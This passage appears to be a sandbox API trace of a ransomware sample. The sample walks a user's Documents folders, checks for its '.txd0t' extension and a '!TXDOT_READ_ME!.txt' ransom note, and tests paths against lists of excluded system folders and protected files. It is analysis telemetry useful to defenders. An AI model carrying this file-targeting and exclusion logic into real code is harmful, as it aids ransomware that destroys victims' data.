returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0119.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="LFpWuQJ-aF.doc.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t" [0119.456] PathFindExtensionW (pszPath="LFpWuQJ-aF.doc.txd0t") returned=".txd0t" [0119.456] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.456] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0x519a4caf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaf0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp.txd0t", cAlternateFileName="WUUIQI~1.TXD")) returned 1 [0119.457] StrCmpW (psz1="wUuIQI1na.odp.txd0t", psz2=".") returned 1 [0119.457] StrCmpW (psz1="wUuIQI1na.odp.txd0t", psz2="..") returned 1 [0119.457] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0119.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0119.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="wUuIQI1na.odp.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t" [0119.457] PathFindExtensionW (pszPath="wUuIQI1na.odp.txd0t") returned=".txd0t" [0119.457] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.457] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0x519a4caf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaf0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp.txd0t", cAlternateFileName="WUUIQI~1.TXD")) returned 0 [0119.457] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.457] GetProcessHeap () returned 0xe30000 [0119.457] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.457] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebf37130, ftCreationTime.dwHighDateTime=0x1d5ed0f, ftLastAccessTime.dwLowDateTime=0xc2d85810, ftLastAccessTime.dwHighDateTime=0x1d5e6f2, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10e7a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="xuaWupFvOSfqE.pps.txd0t", cAlternateFileName="XUAWUP~1.TXD")) returned 1 [0119.457] StrCmpW (psz1="xuaWupFvOSfqE.pps.txd0t", psz2=".") returned 1 [0119.457] StrCmpW (psz1="xuaWupFvOSfqE.pps.txd0t", psz2="..") returned 1 [0119.457] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0119.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="xuaWupFvOSfqE.pps.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t" [0119.457] PathFindExtensionW (pszPath="xuaWupFvOSfqE.pps.txd0t") returned=".txd0t" [0119.457] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.457] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 1 [0119.457] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2=".") returned 1 [0119.457] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2="..") returned 1 [0119.457] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0119.457] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="_L78DH7wK y2TBjiEU", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system32\\") returned 0x0 [0119.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system\\") returned 0x0 [0119.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\local\\") returned 0x0 [0119.457] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\boot\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\perflogs\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\programdata\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\drivers\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\wsus\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="crypt_detect") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="cryptolocker") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="ransomware") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\WINDOWS") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.458] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files") returned 0x0 [0119.458] GetProcessHeap () returned 0xe30000 [0119.458] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f4) returned 0xed90d0 [0119.458] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.458] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\*", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*" [0119.458] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*", lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1cb0 [0119.458] StrCmpW (psz1=".", psz2=".") returned 0 [0119.458] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.458] StrCmpW (psz1="..", psz2=".") returned 1 [0119.458] StrCmpW (psz1="..", psz2="..") returned 0 [0119.458] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519f1183, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x519f1183, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519f1183, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.458] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.458] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.458] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt" [0119.459] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.459] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.459] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.459] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcb4b0, ftCreationTime.dwHighDateTime=0x1d5eeb8, ftLastAccessTime.dwLowDateTime=0x6f5cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ecf7, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb3, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CNnaWo_J.xls.txd0t", cAlternateFileName="CNNAWO~1.TXD")) returned 1 [0119.459] StrCmpW (psz1="CNnaWo_J.xls.txd0t", psz2=".") returned 1 [0119.459] StrCmpW (psz1="CNnaWo_J.xls.txd0t", psz2="..") returned 1 [0119.459] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="CNnaWo_J.xls.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t" [0119.459] PathFindExtensionW (pszPath="CNnaWo_J.xls.txd0t") returned=".txd0t" [0119.459] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.459] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3bd1d60, ftCreationTime.dwHighDateTime=0x1d5e397, ftLastAccessTime.dwLowDateTime=0xc80579a0, ftLastAccessTime.dwHighDateTime=0x1d5ed7b, ftLastWriteTime.dwLowDateTime=0x519f1183, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5ae8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="EPWE.xlsx.txd0t", cAlternateFileName="EPWEXL~1.TXD")) returned 1 [0119.459] StrCmpW (psz1="EPWE.xlsx.txd0t", psz2=".") returned 1 [0119.459] StrCmpW (psz1="EPWE.xlsx.txd0t", psz2="..") returned 1 [0119.459] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="EPWE.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t" [0119.459] PathFindExtensionW (pszPath="EPWE.xlsx.txd0t") returned=".txd0t" [0119.460] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.460] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ab2080, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0x976cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ebe8, ftLastWriteTime.dwLowDateTime=0x51a1751f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6758, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="JzVy_5xEKQ.xlsx.txd0t", cAlternateFileName="JZVY_5~1.TXD")) returned 1 [0119.460] StrCmpW (psz1="JzVy_5xEKQ.xlsx.txd0t", psz2=".") returned 1 [0119.460] StrCmpW (psz1="JzVy_5xEKQ.xlsx.txd0t", psz2="..") returned 1 [0119.460] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="JzVy_5xEKQ.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t" [0119.460] PathFindExtensionW (pszPath="JzVy_5xEKQ.xlsx.txd0t") returned=".txd0t" [0119.460] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.460] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc03379e0, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x7f85f110, ftLastAccessTime.dwHighDateTime=0x1d5ec9e, ftLastWriteTime.dwLowDateTime=0x51a1751f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbca6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="M24gnx.pps.txd0t", cAlternateFileName="M24GNX~1.TXD")) returned 1 [0119.460] StrCmpW (psz1="M24gnx.pps.txd0t", psz2=".") returned 1 [0119.460] StrCmpW (psz1="M24gnx.pps.txd0t", psz2="..") returned 1 [0119.460] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="M24gnx.pps.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t" [0119.460] PathFindExtensionW (pszPath="M24gnx.pps.txd0t") returned=".txd0t" [0119.460] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.460] FindNextFileW (in: hFindFile=0xec1cb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eeea7d0, ftCreationTime.dwHighDateTime=0x1d5e48e, ftLastAccessTime.dwLowDateTime=0xdb33cc00, ftLastAccessTime.dwHighDateTime=0x1d5e1b6, ftLastWriteTime.dwLowDateTime=0x51a3d769, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14790, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MXMHgMI.ods.txd0t", cAlternateFileName="MXMHGM~1.TXD")) returned 1 [0119.460] StrCmpW (psz1="MXMHgMI.ods.txd0t", psz2=".") returned 1 [0119.460] StrCmpW (psz1="MXMHgMI.ods.txd0t", psz2="..") returned 1 [0119.460] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0119.460] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: 